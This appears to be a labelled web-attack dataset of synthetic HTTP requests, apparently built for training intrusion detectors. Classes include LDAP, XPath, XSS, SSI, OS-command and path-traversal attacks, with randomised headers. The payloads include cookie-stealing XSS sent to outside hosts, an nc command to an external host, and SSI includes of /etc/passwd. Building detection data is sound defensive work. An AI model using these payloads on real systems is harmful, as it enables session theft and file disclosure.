X-Serial-Number: 659531112
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39641
Start - Id: 37979
class: LdapInjection
GET /connectVIE-childUH/ot@S2yBnjK91g3F/6u/8Z4bodyZ3_/gNOG_5CcuuL4/nWf/my/i1svcsEiun1decuha.css?ut5tuaes5nyAx=%29+++%28++%7C+++%28+++cn%3D*o++%27brien*++++%29%28mail%3D*o%27brien*%29 HTTP/1.1
Host: 234.106.135.100
Connection: close
Accept: image/*, video/*, image/jpeg;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.4, x-mac-ce, windows-1254, iso-2022-jp;q=0.0
Accept-Encoding: identity;q=0.8, identity, identity, compress;q=0.4, identity
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 4.162.83.225
Cookie: iwlrn=?hAri;tDmmua8gxm=fEea
Cookie2: $Version="64"
Date: Tue, 26 Jun 07 08:14:16 CET
ETag: W/"f@fO0MyLgdLSoe3VulIJ"
Expect: 100-continue
From: ismia@jutuoqaes.be
If-Modified-Since: Thu, 27 Aug 09 11:37:43 GMT
If-Unmodified-Since: Sat, 15 Jan 05 20:08:09 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 13 Jul 09 21:45:24 UTC
Max-Forwards: 9
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest response="Dbd2EEdfF8FAEeFcAac9e11e54251C0d"
Range: 4893-,-7197
Referer: http://iE3hoA.uk/mclu/oaoj.exe
TE: trailers
Trailer: Warning
User-Agent: nodVA/9.1.7.4.7
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 8848x2681
Via: HTTP/1.9 www.ltTe.css:8239, 4.8 www.e7hr.jpg, ck9o/7.0 125.0.154.24
Transfer-Encoding: deflate
Upgrade: ieu/6.3
Warning: 489 www.OrprSscd.gif "nuIoc" "Wed, 01 Aug 07 18:56:21 GMT"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37979
Start - Id: 37054
class: LdapInjection
GET /nczddHieEu/e6zwPrs7lSmYlfnN/QI/aenp83isrf1m/iSVKYhlFTPO5q2Z0v/Cydrop_@q/n6oH0mTZ8gaJ/dBZnI350Qcx6REI_Uw/SSaRus2mnCh/jtori/lE6o68eae.php?scstst=t6%29%28%26%28objectClass+%3D++un*%29 HTTP/1.1
Host: 51.27.21.29:0683
Connection: close
Accept: audio/*, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.2, compress;q=0.2, gzip, identity
Accept-Language: *
Cache-Control: max-age=128
Client-ip: 197.60.249.140
Cookie: t6oAocsmhwro3m=eoapasswdh>1cdonS;9wobjectK6G=90290;passwdKHTGIOEQ=sEsq4wtj aG;asaenlcG=cq2e/style'Ti
Cookie2: $Version="68"
Date: Sun, 29 Oct 06 07:29:47 CET
ETag: "EHiX6-deO9OfaYi"
Expect: 100-continue
From: umuI@4eritQe.de
If-Modified-Since: Sat, 16 Feb 08 05:55:14 UTC
If-Unmodified-Since: Sun, 25 Oct 09 04:54:26 GMT
If-Match: "tam9Wvcj.NPBOl5OhObA"
If-None-Match: "q@hzPsFAL1z1fYHKmt"
If-Range: Fri, 16 Mar 07 15:56:45 UTC
Max-Forwards: 74
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Basic Y2VNaWo6YWRuZVI=
Range: 03242-,-0
Referer: /eieltE/aeeeic8I/iNNhd.ace
TE: deflate;q=0.0,trailers
Trailer: If-Modified-Since
User-Agent: yiebr (o0NL.waTyc; sbZJhcMv4; n0Vu6XpE88; oqTLgX; iOBDsyLi)
UA-CPU: 68000
UA-Disp: 907,610,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 716x540
Via: 6.8 www.fc02Da.shtml
Transfer-Encoding: compress
Upgrade: rca/1.3
Warning: 047 34.25.200.147 "rrtrnbieiteop" "Sun, 03 Feb 08 04:41:40 UTC"
X-Forwarded-For: 143.102.250.73
X-Serial-Number: 595061014884085769
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37054
Start - Id: 38696
class: LdapInjection
GET /Uccaheuehpoihm/rd6P2GYju/s4MeLMywQtJvlw/snsetuhyiuot4teooph/vvE8tmpodvy5.png?zi-QMaQ=75836&uurHoa9e4=oOubl%27o8lbl%7C5t%3B%27R7e+&uylrjiicmsfseh=ufr8t&xp_PKhMF=u+Atperlm%26h%27syh&sis=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&da0=5287&SD_PoUKK=7036&unu=8848&Rw3sAStlun=6153499&n1asetuRudk0=jsne&wendCos=nrj2ZMNOf1MV&dwtssdhbndjqgns=mrd0&qT3naz=ua9oi9mEsdr&usbeouis=+lPe HTTP/1.0
Host: 255.110.168.91
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1250, iso-8859-5, iso-8859-3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 218.181.248.159
Cookie: 3rdeoenIsIn5t=276;connectb.xtermVAJ4-Co=4;@_LKP%u=duts;zM-t=4095580;ufeas=130
Cookie2: $Version="63"
Date: Sat, 10 Apr 04 06:57:54 UTC
ETag: "fO3hMoGbmyhoF4WVadN_"
Expect: ribEgiA=itelO;odita
From: nTromT8u@pzcel.it
If-Modified-Since: Wed, 18 Mar 09 01:57:21 GMT
If-Unmodified-Since: Thu, 13 Aug 09 17:37:05 CET
If-Match: *
If-None-Match: "82WF.AE6RI@rmqrM99"
If-Range: Sat, 07 Apr 07 14:03:42 GMT
Max-Forwards: 0002
MIME-Version: 5.4
Pragma: nathli='r'
Proxy-Authorization: Digest realm
Authorization: Digest realm
Range: 32-1,3888-481886
Referer: /pnjo/Olsb9yU/plskm/8t42aoc/heEfrer.gz
TE: deflate;q=0.3,trailers,trailers
Trailer: Accept-Language
User-Agent: eiclkaaes/0.8
UA-CPU: 68000
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 420x9995
Via: 0.1 www.dida.jpeg, 3.6 178.2.65.161, tkUtN/6.4 www.dyvlseh5.htm
Transfer-Encoding: gzip
Upgrade: s1i4r/2.1, mrhpoe/7.3, dua/2.5, lrn/6.4
Warning: 442 77.207.105.249 "n0tcfehentkl" 
X-Forwarded-For: 249.144.3.114
X-Serial-Number: 7677444389981478018
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38696
Start - Id: 47123
class: XSS
GET /8idiJe4Ag3A/tJtdImAwOq4tm8tFZX/kahastgwtnj/MGl/pZBpwU@q.Qt3g.nO/hs6Ee/2mx_.js?yttpdyHrhltrc=b%2Fu%24&n3Et=%3Ciframe++src+++%3D++%22++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F189.207.229.115%2Ftioric.cfm%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E HTTP/1.0
Host: www.vcNzp2.it
Connection: keep-alive
Accept: text/plain, text/*;q=0.6, image/gif;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: Erxl-cbv, iiG4oeoc-a1P, i3-lvcienaI, eesg-oiweek;q=0.2
Cache-Control: max-age=6
Client-ip: 111.27.185.154
Cookie: 0XNpncMk=381579
Cookie2: $Version="7"
Date: Mon, 28 Mar 05 09:31:25 UTC
ETag: "mQNu2WqrXNJIUGh7"
Expect: sra9A=H3ma;sioief8
From: dy0mird@eelb.it
If-Modified-Since: Fri, 17 Nov 06 02:08:31 UTC
If-Unmodified-Since: Mon, 21 Aug 06 01:21:22 CET
If-Match: "qqyGfsx.zGKl71-SzEs9"
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 0
MIME-Version: 5.8
Pragma: ghnp2d='dau'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM YjIwNXlqc3JsYWFobm5mdHVuaWFlYUx0eXluaWR6bXd3MXNuek5oc2Noc2g=
Range: 38-13,-4
Referer: /meDeire.nsf
TE: deflate
Trailer: Authorization
User-Agent: Mozilla/7.9 (Machintosh; U; PPC Mac OS X 7.2; rm-RC; rv:3.6.9) Gecko/13615550
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7372x166
Via: HTTP/3.3 www.ggoa.css, 7.8 www.c5erhzje.gif
Transfer-Encoding: compress
Upgrade: pen/9.1, ccf/6.5
Warning: 236 www.awsdo.css "gdocuisscirL" "Fri, 28 Dec 07 18:21:26 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47123
Start - Id: 47628
class: XSS
GET /vejRAmxlChnTeXo/eAxhe61httoawbi/oM3w@0/w./rmyuSSjY1Qv/h4v4rRWhHqeXznEDzxkZ/yY7.9sLAhx4_4Z52T3k/Jg/edeeo7tlasT8isehnuNe/cRcUY.jpeg?otl=%3C%3Cscript+++%3E%5Balert++++%28%27hn4tii%27%29%3B%5D%3C%2Fscript++++%3E&sUfbdSAj=wtaosTEaLuditedewh&nu7ec=welenHemochaa&hkhrznSztenre=s%29eop40aasc5&soysgcjettefq=86463450&etEr7h3rEcf=708&kkincludeI6ZH_=%7EmTeh&roeedcYo0tEeaqa=060&g9ueHisks=57&thS2adEpoenx3=Hiolzstrdor&u6AuC2xtmpT=toxcjeOoy76aNprUnd&FyI0=ashutdown8i&KcKK-RQ1qpdivV=Mdr HTTP/1.0
Host: www.aKeiigtfs.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-8;q=0.8, euc-tw;q=0.5, iso-8859-6, x-mac-roman;q=0.3
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 58.158.9.220
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="477"
Date: Fri, 01 Jun 07 06:34:26 UTC
ETag: W/"rNt6c_sZROstoX2T"
Expect: 100-continue
From: aampiq@d5vosUe.cz
If-Modified-Since: Sat, 17 May 08 18:23:49 CET
If-Unmodified-Since: Mon, 19 Feb 07 09:59:49 GMT
If-Match: "WZxAhekJ3qSwjf5"
If-None-Match: "BAnmKkNBk6xqA4BRi"
If-Range: Tue, 08 Nov 05 16:14:36 UTC
Max-Forwards: 5
MIME-Version: 5.8
Pragma: 5iprcsie=0hK
Proxy-Authorization: Digest cnonce="femknga"
Authorization: onc1 ascun=tnayt1d
Range: -1463,157-2
Referer: http://ailair.fr/rfrR3/k3am/tzclh/Cyea8k/s3rmt.php4
TE: trailers,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/1.4 (Windows; U; Win98 3.7; ts-ao; rv:5.3.5) Gecko/40927940
UA-CPU: StrongARM
UA-Disp: 434,760,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: 1.5 138.27.107.48:4150
Transfer-Encoding: compress
Upgrade: eok7ht/3.9, 9eex4/3.3
Warning: 297 www.hzbts.tiff "tresi" "Wed, 25 Apr 07 19:25:41 CET"
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47628
Start - Id: 38142
class: LdapInjection
GET /kjbwlvC.al6/u43oelqnAas4aey/5MgV@G66v0x/P1/ct45dsAPdjeicezee/4fEjQIjPwinnteqkno/tESNEbF-q@So1NXm/nrAWqG7OA2ilP@b/rISDCY7y7/wwhCtD_q0hSCks1u/0nwlehibmtio.jpg?oeiWlieeo7=37127065&negGunnfeee=edMe6Ec&wfuee3gLAa=863&kkHBQD=aen4kh0tqheEfImtp&ypvqeqgnas=otievreeAlaei&dtncqahre=0lvconnectt&aattb=n9fZPI%40eR&o47=98951492&teConretra=4132970&rsdt2=%29++++%28++++%7C%28displayName%3Dhad*%29+%28name+++%3D++had*+++%29%28++mail%3Dhad*%29 HTTP/1.1
Host: www.5nrEBCmom.com:0238
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.5, windows-1250;q=0.4, cp-950;q=0.1
Accept-Encoding: *
Accept-Language: oct-f, mt-8sl2nl
Cache-Control: min-fresh=5
Client-ip: 91.30.161.167
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="23"
Date: Thu, 20 Jan 05 20:17:32 GMT
ETag: W/"nDAIJJveFazGhbicY@"
Expect: us1nGEnf=cndIo0;sIgemuds
From: dhwtp@mnnuok.fr
If-Modified-Since: Mon, 03 May 10 15:11:59 UTC
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "Gfx47jftAuUdJGxeZq"
If-None-Match: "-.M-32mUStBWjNK62A"
If-Range: "s1SwB_9s1lCNBy5QIjrN"
Max-Forwards: 7684
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic dGFuZW95eGU6ZXR5YzI=
Range: 652463-080254,-92,5914-088
Referer: /eewe/DecxAnM.aspx
TE: deflate;q=0.6,chunked,gzip
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 5.1; na-ma; rv:8.8.8) Gecko/42032558
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9560x3335
Via: FTP/1.6 www.umOTiraa.gif, 2.2 www.tE2eobdr.png, HTTP/5.7 www.7n5tssgd.gif
Transfer-Encoding: clau2c
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38142
Start - Id: 43287
class: OsCommanding
GET /afKD.2v27KjxFBwh/dhllydatnrItCte/etan2diaegsiE5t12o/y2QEX.Kyu5yUTkHThQZ9/8dCp0.msf?fiwmsmamglrmg2=3467393&67nesil=hThrgroup+byae%27Bp2hw3m&EysmtiwaIr=55102&artub=vimn&Rhiie9nveninr=39061659&srctNhfe=ssiwraIa&7yitd0th=1844259&ioiec2nes=nkivltnc9mi3ncadEi&hgett1iess=%3Fs+i&4wp-mMEmorxPtU2=%250a+++nc++www.oriendin.com++80+++%3B&tlruNs6turb=eededehomet3OQ%7Cip HTTP/1.1
Host: www.ienln4m.st:735
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate, gzip;q=0.7, gzip, compress
Accept-Language: a-e;q=0.0, apswSxr-HNlrt, ebsetnuc-rIueeir, tni-orua;q=0.2
Cache-Control: no-store
Client-ip: 41.151.127.122
Cookie: adstaij5ov=2122835;r5tEeuxphq2=7;49rmelat=11742413
Cookie2: $Version="1"
Date: Sun, 24 Sep 06 07:20:35 UTC
ETag: W/"9LxvEG1xl9f1meqjQ5m"
Expect: eseen=neaJteee;eS28xdNp=wcmsga
From: fztees@dntsngao.be
If-Modified-Since: Wed, 29 Apr 09 24:35:56 CET
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 20 Sep 04 03:49:49 GMT
Max-Forwards: 4
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: mVat alaCi5eC=cfwd
Range: -8678
Referer: /grnhu5/aa1t/e9sO5fed.png
TE: chunked
Trailer: Range
User-Agent: e4e73EpBc/5.6.3.1.2
UA-CPU: MIPS
UA-Disp: 5548,243,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: FTP/0.2 101.232.26.216
Transfer-Encoding: deflate
Upgrade: hhiwe/3.0
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 75919
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43287
Start - Id: 37658
class: LdapInjection
POST /esh/1tRtb/gxe/ueZeroenaherAala/uXJcEB3Zy9kG7/edhzckjivnPArdrea/voJRZdBV5eIN/rtn90/gHa7/aaseemreuTpe/7AgdYzV.asp? HTTP/1.0
Content-Length: 324
Content-Language: olihe,mtgf2toi
Content-Encoding: gzip
Content-Location: /nexpm9eO/feayi/vnzA/ssrucph.pl
Content-MD5: ZTNjZW9iZWNlajFjNHkyYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Sat, 23 Oct 04 22:44:05 UTC
Host: 246.99.246.140
Connection: evtaArdt
Accept: application/*, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tS-ar7G, dSbab4rn-eR;q=0.1, o5Seiko-o4iuo
Cache-Control: max-age=18849
Client-ip: 88.224.210.21
Cookie: mdodolaak=6815;vsteh=leso;nehvrNday1d=e$og;aa2lyoRhaete=afe noad
Cookie2: $Version="3"
Date: Sat, 23 Oct 04 22:37:36 UTC
ETag: "L1wKH0qc0h5OgNanY"
Expect: dI7o=fopMiaaa;che6mei=fphDmee
From: p9ot@shsomno.org
If-Modified-Since: Sun, 01 Feb 09 01:27:21 GMT
If-Unmodified-Since: Sun, 10 Dec 06 08:43:19 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 076
MIME-Version: 8.2
Pragma: ece7TLac=yznn
Proxy-Authorization: Basic dUhlbTJpOnJzbXR2bHNx
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://www.baoraecm.uk/pdysehEo/ecib/MueAs/s5aensL.jpg
TE: deflate;q=0.0,chunked
Trailer: Connection
User-Agent: eonluhsni/1.5.1.8.4
UA-CPU: StrongARM
UA-Disp: 8272,2255,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: 7.9 25.155.173.193, 8.4 www.arto.tiff, 3.1 226.237.231.204
Transfer-Encoding: Edla0w; ealhgc=lFheip3
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sDneqtxecvuSj1=to&tEowAu=41&f7yvbscriptd=l15G-7.&mRH8telnet0a=A|d(tfoo;uih7&jd7MvarGF0B=096416&r6MM=74997&uKhectheibg=nf.7fv9R&tUod=275&vV_0=)(    |   (displayName=had*)(name=    had*    )(  mail=had*   )&9eQupftpTUYhtacces9=87362&dlloe=9864&ttmbraO4=s0endno&otrrwgsraew=tcf&mConlnea5ara=oNNWIm

End - Id: 37658
Start - Id: 40553
class: SSI
GET /A1iants45E1r.msf?etolmahCniddk=523137&rhDnj=84626881&nfsrletqs0=easiceesf&isccuhxp1aa=79410151&N.OSAdZ4gRk=rto1ehfnm3&rJ3CpMchildS=61801638&mznyqo=%3C%21--+++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&C5bB4H1-scriptUks=darqTlh9oeirtslnt HTTP/1.1
Host: 206.83.247.84
Connection: siaetm
Accept: video/quicktime;q=0.5, application/postscript
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: 5sl4eRI-t8Iane9, rglt-AoWiY, e-urfeBE;q=0.5, ldoeAeoI-tiiqiNh, ra-tiaLamI
Cache-Control: no-transform
Client-ip: 125.226.150.170
Cookie: ISFQr6PDu=pJmlwczATQ;qVC.TWteorq9O=ehGSonzZ8w;ui=ntc6W;2as3ci=1711107
Cookie2: $Version="29"
Date: Tue, 29 Sep 09 13:52:36 GMT
ETag: "CQ8Sji9UIcN@wmVMA7MA"
Expect: id3arean
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Sat, 20 Dec 08 18:02:38 UTC
If-Unmodified-Since: Sun, 19 Jul 09 17:56:23 UTC
If-Match: "fNKjw-cln9ZBaF0"
If-None-Match: *
If-Range: Wed, 05 May 10 19:54:23 UTC
Max-Forwards: 8253
Pragma: no-cache
Proxy-Authorization: oN5jt reom=owea
Authorization: Digest nc=04bCfCaa
Range: 092301-3,261-278,-586839
Referer: http://a2oS0re.net/vtsle5r/dgahpefE/osci.asmx
TE: gzip,trailers
Trailer: Pragma
User-Agent: adt1tFym (lwuLOX)
UA-OS: Windows 98
UA-Pixels: 0455x286
Transfer-Encoding: identity
Warning: 974 www.inhoeya.htm "uueaoTh5Rtrptbbs" 
X-Forwarded-For: 62.56.145.236
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40553
Start - Id: 39573
class: SSI
PUT /Onvyq/o2TGTZ5EpZ9y/b4PoscnhThMeneqtoc/ulb7mNfybuszsCowlr/oLiNAderUikye3/pi47/ac@.php? HTTP/1.1
Content-Length: 280
Content-Language: ehnohe
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Host: www.egoZdheu.net
Connection: ohEt
Accept: image/*, audio/basic;q=0.4
Accept-Charset: euc-jp;q=0.8, iso-8859-8-i;q=0.0
Accept-Encoding: 
Accept-Language: xnn-boot;q=0.3, sIlnaprs-benvigl;q=0.3
Date: Sun, 27 Jan 08 15:30:10 GMT
If-Unmodified-Since: Sun, 31 Jul 05 24:06:17 CET
If-None-Match: "TeDh@HPc5mHuMXdZ7h"
Referer: http://www.ma6sdot.net/mpnt2tan/befaer/cIsler.tar
User-Agent: Mozilla/7.8 (Machintosh; U; PPC 3.8; no-yr; rv:9.7.9) Gecko/53998688
----: -------------------------------------------------

or4soqtah4cule=1805515&utem0se= ||Eg y\ohttpcexecwsWyaxml&encex=processing-instructiongq n&Tmt=01134115&baeeutpehy7=kno&9njeey7eniuioB=13722795&zthelsemcxrh=99147&4eb1fAucosuny=<!--#include   virtual="/etc/passwd"-->&etilei=u_nzxigk1&rargbet5t=nDoTQC9JWFhm

End - Id: 39573
Start - Id: 35822
class: XPathInjection
GET /Q0WCUcopybm/jDn6V_o-/gdDXamrvmkVvY/n9TJLJ3XERs/ta30E/i6MWggZGH/8hcuGxgiXIEQmR/gRVT/mnva.msf?ofEshegtXX=abdmuiag%27++or++h%2Fel%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D87%5D++or+++%27at%27%3D++%27&ostorbEhnlloch=d0pEXpn5&anadve2ioitt=927 HTTP/1.1
Host: www.tLew.de
Connection: keep-alive
Accept: application/*;q=0.3, audio/*;q=0.1
Accept-Charset: x-mac-chinesetrad;q=0.3, euc-cn;q=0.3, iso-10646-ucs-2;q=0.2, cp-950;q=0.8, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=7
Client-ip: 46.200.186.58
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Tue, 03 Jan 06 02:23:34 UTC
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Sun, 16 Jan 05 02:53:56 GMT
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: "OZ1Md3zff@LVMyik2"
If-None-Match: "xlk8HcX8sPbfCx7"
If-Range: Thu, 08 May 08 14:51:39 GMT
Max-Forwards: 9486
MIME-Version: 2.2
Pragma: rdtriN=ia0dhoi
Proxy-Authorization: luLc Okt8e=3llo
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 205-0247
Referer: /roieta/ti3dhta/wxuGmis/aTaasw/cwncg.txt
TE: trailers,trailers
Trailer: Via
User-Agent: baTcwa5ga
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: 6.0 www.aygtea5.png
Transfer-Encoding: compress
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 351 24.73.41.38:3 "Asogrdto" 
X-Forwarded-For: 43.11.206.228
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35822
Start - Id: 44816
class: PathTransversal
GET /Oiieelpf7ee9/iL/9pB/CooJz/yBuLm.EPjda/m6IeMUQz5zCQ@lBqlNoZ.js?I2hnw=file%3A%2F%2F%2Fl%3A%2FHOh%2FwmiET%2FuA12sete.xml&xyJNRKYGH@services=hIe4%7Enstiastyleh%3Ez&ertzeomi5sTa=eNfTwyQDH6VP HTTP/1.1
Host: www.Sni6Rtniee.st
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-3
Accept-Encoding: 
Accept-Language: eaabw-jbas;q=0.2
Cache-Control: no-cache
Client-ip: 253.244.117.170
Cookie: W2X-9gGQI=slRmwmdhq;id0csz=>eavz@8Nt;t5m3mhruur=e0iss
Cookie2: $Version="23"
Date: Fri, 26 Jun 09 05:16:06 CET
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Tue, 08 Jul 08 19:28:27 GMT
If-Unmodified-Since: Sun, 31 May 09 02:36:04 GMT
If-Match: "arvxUYUB2bHptKA2"
If-None-Match: *
If-Range: Fri, 16 Feb 07 12:23:00 CET
Max-Forwards: 0691
MIME-Version: 9.8
Pragma: s=yaEdmem
Proxy-Authorization: NTLM YUhlQmxaMW5vM090THVlaXJyZXVldG5zRWJvOWhmbmplbm8wcld3c21udlpwZWU=
Authorization: Basic c2ZvOTdpOnR0bjRvbnQ=
Range: 925-,21-,7-
Referer: /Udwe/nHenAodn/uandas/ssesew4/amdeGf.sh
TE: trailers,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 9.8; Nl-ir; rv:8.3.2) Gecko/28308716
UA-CPU: PowerPC
UA-Disp: 035,8983,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0162x7659
Via: HTTP/9.0 100.103.80.119, HTTP/4.1 www.o9ranbp.tiff
Transfer-Encoding: compress
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 444 49.226.175.61:095 "anooncjio" "Wed, 26 Jul 06 23:48:52 GMT"
X-Forwarded-For: 65.58.42.42
X-Serial-Number: 40759970154914
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44816
Start - Id: 47007
class: XSS
GET /Rtumon/vlTitrwqsnplvrruoico/aFTIh1SCY5vQ5M/1HLRz/t0lJtIj7/e6/rG4t6B1GO3OPBpFmMYy/wW8V9dropMfJo0M/WyphpZOxcvimo1childrx/bTblqohRCGuCJQMKWyLi.cgi?qatEeeet1nss=903808&Taay=gfglgdiv&shljnli4sllno=tAukmsegbro&7ryteauna=to%40netcatoEh%29aomne+y&rmeW=uh&otzminFdbnv4ri=s&uanetttOmiherE=nH9zRv&we=ps&nea5Irwssewh=6898924213&vui0eam=w8dr0at2vie&ezabepcSn=%3C%3Cscript%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ni.com%2Fcgi-bin%2Ftarera.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E&cdd5ltkrgohttl=zX4s02&unono=A9h HTTP/1.0
Host: 196.132.95.44
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ie2lMtJ-rhtx8;q=0.1, us5eomi0-dhta6, Ib-7redltgm;q=0.3
Cache-Control: min-fresh=9
Client-ip: 18.81.58.217
Cookie: ugnpd=21;0log..k2=oeaua;smdaI=o<aiille%insert
Cookie2: $Version="07"
Date: Mon, 03 May 04 08:48:38 UTC
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 100-continue
From: vsl8rn@orhoE.de
If-Modified-Since: Sat, 08 Aug 09 10:50:52 GMT
If-Unmodified-Since: Sat, 17 Jul 04 02:09:33 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 18 Oct 09 22:55:45 GMT
Max-Forwards: 97
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic YXN3clRGOmVyY2w=
Authorization: Digest opaque="u56ztxl4"
Range: 5-22964
Referer: /wu3IaH/gxuawsa9/ehtjdd/hpTeee/are5.wmn
TE: trailers
Trailer: Upgrade
User-Agent: uktoe6dn6tNn1vhnvzic
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 347x3393
Via: Ais/6.2 55.196.188.47, 2.1 88.186.140.32
Transfer-Encoding: dfqc
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 566 128.189.134.143 "YDlny79wlhoin" "Sun, 22 Jun 08 15:26:41 CET"
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 159927284892004319
----: -----------------------------------------
